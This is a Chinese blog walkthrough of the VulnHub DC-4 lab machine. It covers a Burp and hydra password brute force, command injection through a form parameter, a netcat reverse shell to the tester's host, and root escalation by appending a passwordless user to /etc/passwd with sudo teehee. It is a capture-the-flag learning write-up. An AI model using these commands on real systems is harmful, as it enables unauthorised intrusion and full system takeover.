栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

渗透测试学习之DC-4

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

渗透测试学习之DC-4

该文章为本人学习DC-4靶机记录

首先部署靶机:下载地址 DC: 4 ~ VulnHub

步骤为直接下载解压,本文直接省略跳过:

主机发现以及信息搜集

nmap -sS 192.168.88.0/24

 

扫描具体信息

nmap -A -v 192.168.88.137

访问80端口的网站

可以看出该网站的账号大概率为Admin或者admin

尝试使用burpsuite爆破一下

然后设置好字典

 

开始爆破,将结果排序一下,可以看出账号为admin,密码happy

登录网站

 

点击command

 

 

看一下bp抓到的包,可以发现可以修改radio的参数来改变命令

首先看看flag,去home目录

似乎不可以直接去,尝试一下getshell

 

 

 

 尝试一下写入一句话木马脚本,似乎被过滤掉了

尝试直接使用shell反弹,我看剑很多人用加号代替空格,其实直接使用空格也可以

 payload:nc -nv 192.168.88.129 6666 -e /bin/bash

 

 使用交互式界面

python -c "import pty; pty.spawn('/bin/bash')"

 查看flag可以知道提示去home的目录看一下,可以看见jim有一个旧的密码本

 

 尝试ssh爆破

hydra -l jim -P pass2.txt ssh://192.168.88.137

爆出成功,使用ssh远程登陆一下,一登陆发现最后一句话 you have mail

ssh jim@192.168.88.137

去/var/mail查看jim的邮件

 切换到chales角色

 

 sudo -l 发现有teehee权限

 尝试网上大佬的teehee提权方式,在passwd文件里写入一个无密码的新用户

echo "jl::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

 然后就是和其他的靶机一样到root目录找flag

 

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/881760.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号